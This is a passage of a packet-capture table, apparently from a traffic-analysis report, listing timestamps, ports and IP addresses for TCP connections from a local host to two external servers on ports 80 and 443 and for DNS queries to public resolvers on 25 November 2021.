Nov 25, 2021 13:01:16.484338999 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.484380960 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.484508038 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.484622955 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.484848022 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.735482931 CET	80	49839	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.754430056 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.754472971 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.754492044 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.754508018 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.754734039 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.754862070 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.763858080 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.763891935 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.763912916 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.763932943 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.763953924 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.763973951 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.763993979 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.764122963 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.764255047 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.765439034 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.765491962 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.765516043 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.765536070 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.765729904 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.765861034 CET	49838	80	192.168.11.20	203.170.80.250
Nov 25, 2021 13:01:16.765916109 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.765943050 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.765964031 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.765985012 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766006947 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766026974 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766051054 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766071081 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766092062 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766113043 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766133070 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766153097 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766172886 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766194105 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766213894 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766233921 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766253948 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766274929 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:16.766294956 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.037615061 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.043567896 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.043632984 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.043674946 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.043716908 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.043759108 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049222946 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049288034 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049330950 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049371958 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049412966 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049453974 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049494028 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049534082 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049575090 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049613953 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049654961 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049695969 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049735069 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049774885 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049814939 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:17.049859047 CET	80	49838	203.170.80.250	192.168.11.20
Nov 25, 2021 13:01:24.708694935 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:24.708794117 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:24.709064007 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:24.763737917 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:24.763796091 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:24.993223906 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:24.993459940 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:24.993496895 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.005702019 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.005755901 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.006546974 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.006784916 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.008722067 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.051997900 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.210479975 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.210556984 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.210638046 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.210685015 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.210787058 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.210848093 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.320796967 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.321062088 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.321089029 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.321399927 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.321552038 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.321573019 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.321597099 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.321647882 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.321877003 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.322129965 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.402451992 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.402800083 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.402858973 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.433218002 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.433454037 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.433711052 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.433881998 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.433913946 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.433928013 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.433952093 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.434362888 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.434530020 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.434560061 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.434637070 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.470829964 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.471076012 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.471208096 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.545159101 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.545361996 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.545437098 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.545825958 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.546021938 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.546514034 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.546664953 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.546686888 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.546710014 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.546724081 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.546797037 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.547035933 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.547178984 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.547205925 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.547317982 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.547559023 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.547708035 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.547801971 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.548086882 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.548326015 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.548424006 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.548569918 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.548733950 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.548778057 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.548796892 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.580847025 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.581095934 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.622786999 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.623074055 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.623209000 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.659143925 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.659323931 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.659387112 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.659753084 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.659909964 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.659934998 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.660008907 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.660341024 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.660558939 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.660587072 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.660665035 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.660701036 CET	443	49840	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:25.660773039 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:25.660945892 CET	49840	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:32.594960928 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:32.595045090 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:32.595242023 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:32.634721994 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:32.634736061 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:32.862760067 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:32.862972021 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:32.863006115 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:32.872488976 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:32.872538090 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:32.873183966 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:32.873464108 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:32.875504971 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:32.915889025 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.079607010 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.079633951 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.079768896 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.079785109 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.079982996 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.079992056 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.189568996 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.189730883 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.189853907 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.189918995 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.190005064 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.190016985 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.190102100 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.190294027 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.232122898 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.232378006 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.300048113 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.300128937 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.300358057 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.300374985 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.300540924 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.300551891 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.300554991 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.300718069 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.300909042 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.340205908 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.340384007 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.340399027 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.340626955 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.342194080 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.342416048 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.410265923 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.410479069 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.410671949 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.410857916 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.411039114 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.411084890 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.411202908 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.411379099 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.411401987 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.411483049 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.411735058 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.411902905 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.412113905 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.412208080 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.412230015 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.412259102 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.412488937 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.412525892 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.412537098 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.450758934 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.450958967 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.450992107 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.451000929 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.451242924 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.452435970 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.452683926 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.452867031 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.453116894 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.453157902 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.522722960 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.522875071 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.522905111 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.522984028 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.523103952 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.523133993 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.523140907 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.523149014 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.523156881 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.523219109 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.523231030 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.523416042 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.523509026 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.523545980 CET	443	49841	107.6.148.162	192.168.11.20
Nov 25, 2021 13:01:33.523551941 CET	49841	443	192.168.11.20	107.6.148.162
Nov 25, 2021 13:01:33.523730993 CET	49841	443	192.168.11.20	107.6.148.162

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 12:54:53.733247995 CET	64777	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:54:53.942935944 CET	53	64777	1.1.1.1	192.168.11.20
Nov 25, 2021 12:55:50.986593008 CET	64821	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:55:51.042181015 CET	53	64821	1.1.1.1	192.168.11.20
Nov 25, 2021 12:55:56.046475887 CET	61564	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:55:57.061180115 CET	61564	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:55:58.076499939 CET	61564	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:55:58.974168062 CET	53	61564	1.1.1.1	192.168.11.20
Nov 25, 2021 12:55:58.974231958 CET	53	61564	1.1.1.1	192.168.11.20
Nov 25, 2021 12:55:58.974685907 CET	61564	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:55:58.974780083 CET	61564	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:56:07.997185946 CET	56248	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:56:08.015940905 CET	53	56248	1.1.1.1	192.168.11.20
Nov 25, 2021 12:56:13.027062893 CET	53255	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:56:13.209991932 CET	53	53255	1.1.1.1	192.168.11.20
Nov 25, 2021 12:56:28.414575100 CET	49562	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:56:28.519181967 CET	53	49562	1.1.1.1	192.168.11.20
Nov 25, 2021 12:56:33.584800005 CET	50167	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:56:33.892754078 CET	53	50167	1.1.1.1	192.168.11.20
Nov 25, 2021 12:56:39.584042072 CET	62464	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:56:39.787123919 CET	53	62464	1.1.1.1	192.168.11.20
Nov 25, 2021 12:56:45.129364967 CET	49398	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:56:45.150636911 CET	53	49398	1.1.1.1	192.168.11.20
Nov 25, 2021 12:56:50.159405947 CET	60310	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:56:50.179316044 CET	53	60310	1.1.1.1	192.168.11.20
Nov 25, 2021 12:56:55.205044031 CET	51194	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:56:55.394290924 CET	53	51194	1.1.1.1	192.168.11.20
Nov 25, 2021 12:56:55.394615889 CET	51194	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:56:55.683530092 CET	53	51194	9.9.9.9	192.168.11.20
Nov 25, 2021 12:57:00.688455105 CET	55956	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:57:00.714526892 CET	53	55956	1.1.1.1	192.168.11.20
Nov 25, 2021 12:57:05.718594074 CET	61027	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:57:05.759927034 CET	53	61027	1.1.1.1	192.168.11.20
Nov 25, 2021 12:57:11.326653957 CET	51554	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:57:11.527509928 CET	53	51554	1.1.1.1	192.168.11.20
Nov 25, 2021 12:57:16.543878078 CET	53452	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:57:17.559029102 CET	53452	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:57:17.784806013 CET	53	53452	1.1.1.1	192.168.11.20
Nov 25, 2021 12:57:17.785197973 CET	53452	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:57:19.576499939 CET	53	53452	9.9.9.9	192.168.11.20
Nov 25, 2021 12:57:19.580840111 CET	53	53452	9.9.9.9	192.168.11.20
Nov 25, 2021 12:57:24.589252949 CET	65087	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:57:24.603919029 CET	53	65087	1.1.1.1	192.168.11.20
Nov 25, 2021 12:57:38.210880041 CET	56194	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:57:38.233838081 CET	53	56194	1.1.1.1	192.168.11.20
Nov 25, 2021 12:57:43.272383928 CET	53641	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:57:43.309425116 CET	53	53641	1.1.1.1	192.168.11.20
Nov 25, 2021 12:57:48.318795919 CET	63846	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:57:48.430073023 CET	53	63846	1.1.1.1	192.168.11.20
Nov 25, 2021 12:58:04.002094984 CET	56575	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:58:04.223543882 CET	53	56575	1.1.1.1	192.168.11.20
Nov 25, 2021 12:58:09.580043077 CET	57154	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:58:09.592269897 CET	53	57154	1.1.1.1	192.168.11.20
Nov 25, 2021 12:58:14.609978914 CET	65150	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:58:14.773039103 CET	53	65150	1.1.1.1	192.168.11.20
Nov 25, 2021 12:58:19.779851913 CET	50512	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:58:19.811454058 CET	53	50512	1.1.1.1	192.168.11.20
Nov 25, 2021 12:58:29.855937958 CET	54346	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:58:30.458825111 CET	53	54346	1.1.1.1	192.168.11.20
Nov 25, 2021 12:58:30.459197998 CET	54346	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:58:30.588610888 CET	53	54346	9.9.9.9	192.168.11.20
Nov 25, 2021 12:58:35.605232954 CET	50022	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:58:35.633763075 CET	53	50022	1.1.1.1	192.168.11.20
Nov 25, 2021 12:58:46.211113930 CET	64496	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:58:46.429765940 CET	64496	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:58:46.431617975 CET	53	64496	1.1.1.1	192.168.11.20
Nov 25, 2021 12:58:46.492364883 CET	53	64496	9.9.9.9	192.168.11.20
Nov 25, 2021 12:58:51.444456100 CET	63125	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:58:51.662826061 CET	63125	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:58:52.678152084 CET	63125	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:58:52.685652018 CET	53	63125	1.1.1.1	192.168.11.20
Nov 25, 2021 12:58:52.686074972 CET	63125	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:58:52.688004971 CET	53	63125	1.1.1.1	192.168.11.20
Nov 25, 2021 12:58:52.688359022 CET	63125	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:58:53.021514893 CET	53	63125	9.9.9.9	192.168.11.20
Nov 25, 2021 12:58:54.459963083 CET	53	63125	9.9.9.9	192.168.11.20
Nov 25, 2021 12:58:54.460007906 CET	53	63125	9.9.9.9	192.168.11.20
Nov 25, 2021 12:58:58.036858082 CET	64278	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:58:58.051316977 CET	53	64278	1.1.1.1	192.168.11.20
Nov 25, 2021 12:59:10.721602917 CET	60313	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:59:10.939840078 CET	60313	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:59:10.964309931 CET	53	60313	1.1.1.1	192.168.11.20
Nov 25, 2021 12:59:11.009278059 CET	53	60313	9.9.9.9	192.168.11.20
Nov 25, 2021 12:59:15.971111059 CET	61719	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:59:16.058739901 CET	53	61719	1.1.1.1	192.168.11.20
Nov 25, 2021 12:59:21.063400030 CET	55372	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:59:21.081434011 CET	53	55372	1.1.1.1	192.168.11.20
Nov 25, 2021 12:59:26.108608961 CET	64668	53	192.168.11.20	1.1.1.1
Nov 25, 2021 12:59:26.327131987 CET	64668	53	192.168.11.20	9.9.9.9
Nov 25, 2021 12:59:26.439765930 CET	53	64668	1.1.1.1	192.168.11.20
Nov 25, 2021 12:59:26.513344049 CET	53	64668	9.9.9.9	192.168.11.20
